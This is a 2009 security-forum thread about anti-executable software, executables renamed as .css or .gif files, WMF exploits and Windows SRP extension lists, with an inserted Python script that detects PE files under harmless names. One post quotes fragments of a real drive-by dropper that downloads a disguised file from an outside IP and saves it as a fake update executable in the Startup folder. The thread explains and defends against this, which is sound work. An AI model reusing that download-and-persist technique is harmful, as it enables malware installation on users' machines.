Anti-Executables - List of

Discussion in 'other anti-malware software' started by StevieO, Sep 4, 2009.

Thread Status:
Not open for further replies.
  1. Windchild

    Windchild Registered Member

    Joined:
    Jun 16, 2009
    Posts:
    571
    I've not looked at the .css file in question, but I would still bet that it's not a real .css file at all. It's most likely just a normal PE executable file that has simply been renamed to something harmless-looking like "colorset.css". That is done all the time, to fool users, malware scanners and all sorts of things into thinking the file is innocent instead of a normal executable that could be anything from a nice game to a nasty rootkit. The file extension doesn't matter at all: if code that is already running (like cmd.exe in this case, or exploit shellcode in some other case) wants to execute a file with a .css extension as a program, it can do that (cmd.exe calls CreateProcess on the file, and if it looks like a program, it is executed even if the file extension is .txt or .css or anything). Simply open the supposed .css file in a hex editor and check the headers - if there's an executable header, then it's a program, not a cascading style sheet at all.

    Once executed, the program can then do what it wants, like create autorun.infs or other files that have innocent extensions but are really programs.

    In this case, I wouldn't be quick to assume there's any exploit at all, as in, a vulnerability that is being exploited. I don't think anything suggests there's a buffer overflow or anything involved. The .css and .pif files are both likely just normal executables with a funny name to make them look innocent. If they can do something HIPS shouldn't allow, then there's probably some bypass of the HIPS products that has been discovered and is taken advantage of by the malware. The things HIPS attempts to do are extremely complex, and it would be a great wonder of the world if they were able to do a flawless job at it.
     
    Last edited: Sep 10, 2009
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Remember that a malcrafted file can do nothing without the proper program to execute the code. Clicking on the file, or running it by remote code execution from a web exploit, calls the program associated with the particular file, and the exploit code runs.

    The day that the wmf exploit surfaced back in 2005, I went to the site and the exploit did not work. Later that day as information trickled in, we learned that the program associated by default with .wmf is the Windows Picture Viewer. I checked my computer and I didn't have that program. It didn't come until WinXP and I had Win2K. The filetype .wmf wasn't even registered on Win2K.

    So, I configured my XP Laptop to test, went to the site again, nothing. For some reason, the exploit would not trigger in Opera. But using IE6 brought results.

    So, we forget sometimes that often, many things have to come together in order to get infected. This is true of PDF and Flash exploits, where a specific version of a program is necessary for the exploit to trigger.

    Later, as the WMF PoC examples that StevieO referred to were released, we found out that other image programs that used a particular DLL were also vulnerable. If they didn't, you would get an error when attempting to open the file:

    [image: wmf-PS.gif]

    A .css file is a plain text file that requires some type of text editor. Here, I open one in Notepad:

    [image: frontier-cssTxt.gif]

    In the frontiers.css file I referenced above, since it is really an executable, we see the binary code when opened in Notepad, but the code cannot execute because Notepad is a plain text editor:

    [image: frontier-notepad.gif]

    That is why the only way aigle can get the .css file to execute its code is from the Command Line, for the reasons Windchild has explained above, and it can be any file extension, as he said.

    To use this file in an exploit would require some way of getting cmd.exe to run the file. This is true of any spoofed executable: some means by remote code execution is necessary to get the file to work. Here is an early such exploit, using an executable spoofed as a .gif file:

    The web-based code first downloads the .gif file:

    Code:
    obj_msxml2.open("GET","http://85.255.1xx/cnte-oiduuyes.gif
    Then, the code renames the file as an .exe, and copies the file to a start up folder:

    Code:
    dstart=obj_WScript.SpecialFolders("Startup");
    
    var fn = daustart+"\\Update_0802_KB110327.exe";
    
    obj_adodb.SaveToFile(fn,2);
    then the file is executed each time the computer reboots.


    ----
    rich
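The check Windchild describes (look at the headers, not the extension) and the renamed-.gif trick Rmus quotes above both come down to the same test: does the file body start like a PE image? The script below is an added example for this thread, not code from any of the posters. It reads the DOS header, follows the e_lfanew pointer at offset 0x3C to the "PE\0\0" signature, and then scans a directory for files that carry a PE body under a non-executable name. The three sample files (colorset.css, frontier.css, update.exe) are constructed in a temporary directory so it runs offline, and the EXECUTABLE_EXTENSIONS set is an assumption for the example, not an SRP or vendor setting.

```python
"""Tell a real executable from a file that has merely been renamed.

Added example for this thread (not code from any poster). It checks the
file *contents* the way a hex editor would: an 'MZ' DOS header, an
e_lfanew pointer at offset 0x3C, and a 'PE\\0\\0' signature where that
pointer lands. Sample files are constructed in a temp directory.
"""
import os
import struct
import tempfile

MZ_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"

# Extensions where a PE body is expected. Anything else holding a PE
# image is a "renamed executable" in the sense discussed in the thread.
# (Assumed list for this example, not an SRP or vendor setting.)
EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".pif", ".cpl",
                         ".ocx", ".sys", ".drv"}

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664


def is_pe_image(data: bytes) -> bool:
    """Return True if `data` starts like a PE image.

    Only the first few KiB of a file are needed: the DOS header is 64
    bytes and e_lfanew normally points a few hundred bytes in.
    """
    if len(data) < 0x40 or data[:2] != MZ_MAGIC:
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # Guard against a bogus pointer that runs past the buffer.
    if e_lfanew + len(PE_SIGNATURE) > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


def pe_machine(data: bytes):
    """Return the COFF Machine field (0x14C i386, 0x8664 x64) or None."""
    if not is_pe_image(data):
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    offset = e_lfanew + 4          # COFF file header follows the signature
    if offset + 2 > len(data):
        return None
    (machine,) = struct.unpack_from("<H", data, offset)
    return machine


def find_masquerading_executables(directory: str) -> list:
    """List files in `directory` whose body is a PE image but whose
    extension is not an executable one (e.g. 'colorset.css')."""
    hits = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            head = fh.read(4096)
        ext = os.path.splitext(name)[1].lower()
        if is_pe_image(head) and ext not in EXECUTABLE_EXTENSIONS:
            hits.append(name)
    return hits


def build_fake_pe(machine: int = IMAGE_FILE_MACHINE_I386) -> bytes:
    """Constructed header bytes for testing: DOS header with e_lfanew = 0x40,
    then 'PE\\0\\0' and a 20-byte COFF file header. Not a loadable program,
    just enough structure for the checks above to recognise."""
    dos_header = bytearray(0x40)
    dos_header[:2] = MZ_MAGIC
    struct.pack_into("<I", dos_header, 0x3C, 0x40)
    coff_header = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0x0102)
    return bytes(dos_header) + PE_SIGNATURE + coff_header


def demo() -> list:
    """Write three constructed files and report which one masquerades."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "colorset.css"), "wb") as fh:
            fh.write(build_fake_pe())                 # renamed executable
        with open(os.path.join(tmp, "frontier.css"), "w") as fh:
            fh.write("body { color: #000; }\n")      # genuine stylesheet
        with open(os.path.join(tmp, "update.exe"), "wb") as fh:
            fh.write(build_fake_pe(IMAGE_FILE_MACHINE_AMD64))
        return find_masquerading_executables(tmp)


if __name__ == "__main__":
    for name in demo():
        print("PE image with non-executable extension:", name)
```

Pointing find_masquerading_executables() at a browser cache or a Startup folder is the practical use: a PE body sitting under a .gif or .css name is exactly the artifact the posts above describe, whatever extension the dropper chose.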
     
  3. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    In a web embedded attack, the files go to the browser cache or designated download directory. The WMF exploit triggered through IE6 downloaded to the Temporary Internet Files directory:

    [image: wmf-dl_2a.gif]


    ----
    rich
     
  4. trismegistos

    trismegistos Registered Member

    Joined:
    Jan 29, 2009
    Posts:
    363
    Thanks to Windchild for the input. As I have already said, this malware simply masqueraded as an innocuous file. I remember Prevxhelp said that for such a file to do its dirty job, the system itself should already be compromised in the first place. Rmus had said that the initial exploit and the succeeding exploit would always take advantage of a remote execution vulnerability (or buffer overflow vulnerability) or active content or scripting (ActiveX, JavaScript, VBScript via cross-site scripting or injected code or redirections to a malware site) or plugins on the web browser.

    Pardon me, Rmus, for the annoyance and some inconvenience on my part. Hats off as always for the nice, clear presentations! Thanks to both of you for the clarifications and for putting this in a proper perspective. The mods could transfer these OTs to their proper thread. Anyway, this is somewhat related, and provides some kind of backgrounder on whether default-deny policies like the use of AE could mitigate such malware attacks.
     
    Last edited: Sep 10, 2009
  5. arran

    arran Registered Member

    Joined:
    Feb 5, 2008
    Posts:
    1,156
    Just thought I'd pop in and say hi. While it is a good secure policy to deny anything unknown from running in the first place, it is also important to make sure your Anti-Executable HIPS intercepts all types of executables.

    Adding another security layer on top of the already near 100 percent protection policy of denying all unknown executables from running: with MD you can also deny the "CREATION" of all executable files. If no such file exists in the first place, how can it execute and run? It's a good safeguard in case, for any reason, your Anti-Executable program should ever get disabled.

    [image: x1.JPG]
     
  6. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Normally, I don't download and run malware, but in that case, knowing what the code in the WMF file did, I tried a few at that time. All that happened was that Windows Explorer crashed. I never got one of the files to execute from the hard drive.

    As for your other questions about malware: I don't know. You will have to ask a malware researcher.

    ----
    rich
     
  7. nick s

    nick s Registered Member

    Joined:
    Nov 20, 2002
    Posts:
    1,430
    That's indeed the case with b.css. It has some interesting properties once you change its extension...
     


  8. trismegistos

    trismegistos Registered Member

    Joined:
    Jan 29, 2009
    Posts:
    363
    About the test wmf exploits c/o StevieO, you've got to test them with a clean install from an old Windows XP CD.
    In a patched system, those exploits will not work, except in some instances where Windows Explorer will crash. Those test exploits will call out either "notepad" or "calculator". An interesting observation was that just hovering the mouse over one .tif file, without even clicking, would call out the application utility "calculator".
     
    Last edited: Sep 12, 2009
  9. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    I could get the test.wmf files to launch the Calculator. I just couldn't get any of the real malware.wmf files to execute on disk -- only by remote code execution from the web site via the Windows Picture Viewer.

    ----
    rich
     
  10. pbw3

    pbw3 Registered Member

    Joined:
    Nov 12, 2007
    Posts:
    113
    Location:
    UK
    I think this is the list that Microsoft includes specifically under SRP extensions (with LNK removed for SRP implementation):

    ADE: Microsoft Access Project Extension
    ADP: Microsoft Access Project
    BAS: Visual Basic Class Module
    BAT: Batch File
    CHM: Compiled HTML Help File
    CMD: Windows NT Command Script
    COM: DOS Command File
    CPL: Control Panel Extension
    CRT: Security Certificate
    EXE: Windows Executable File
    HLP: Windows Help File
    HTA: HTML Application
    INF: Setup Information File
    INS: Internet Communication Settings
    ISP: Internet Communication Settings
    LNK: Shortcut
    MDB: Microsoft Access Application
    MDE: Microsoft Access MDE Database
    MSC: Microsoft Common Console Document
    MSI: Windows Installer Package
    MSP: Windows Installer Patch
    OCX: ActiveX Objects
    PCD: Photo CD Image
    PIF: Shortcut to MS-DOS Program
    PIF: Program Information File
    REG: Registration Entries
    SCR: Screen Saver
    SCRIPT: Generic Script File
    SHS: Shell Scrap Object File (hidden)
    URL: Internet Shortcut (Uniform Resource Locator)
    VB: VBScript File
    WSC: Windows Script Component

    There are many more that others include indirectly as executables, for example, macros in XLS docs etc. A couple of other links:

    http://pcsupport.about.com/od/tipstricks/a/execfileext.htm

    http://antivirus.about.com/od/securitytips/a/fileextview.htm

    I think there are threads on here somewhere (on SRP etc.), which I couldn't immediately find, from a year or so back with more info as well.
     
    Last edited: Sep 11, 2009
  11. pbw3

    pbw3 Registered Member

    Joined:
    Nov 12, 2007
    Posts:
    113
    Location:
    UK
    Hi.. Is that because you're running in admin mode?

    Running in LUA mode, I simply install any program or run any update separately "as an admin" - I don't need to switch SRP on and off at all...
     
    Last edited: Sep 11, 2009
  12. Pedro

    Pedro Registered Member

    Joined:
    Nov 2, 2006
    Posts:
    3,502
    If it's binary and about to be executed, SRP blocks them all no matter the extension. It doesn't work with extensions for binary executable files and vb scripts.

    For non-Microsoft interpreters, it most likely depends on the extensions list, and relies on the execution starting from explorer or IE.
    http://technet.microsoft.com/en-us/library/cc786941(WS.10).aspx

    Wilders discussion: Software Restriction Policy vs Antiexecutable
     
  13. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    Thanks for that post.
    I think Faronics AE also blocks new exe's if ran from the command prompt.
     
  14. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    Thanks for all the responses so far, some very nice info there.

    Well, I've been and gone and done it, yep, installed WinSonar!!! After a couple of years without it, trying various other apps, it feels like I'm back home again, so to speak. And yes, it feels good too.

    The last time was on 98SE and I loved it, very light and very little noise. It just does what it says it will on the tin. So it'll be interesting to see how things go now I'm on XP.
     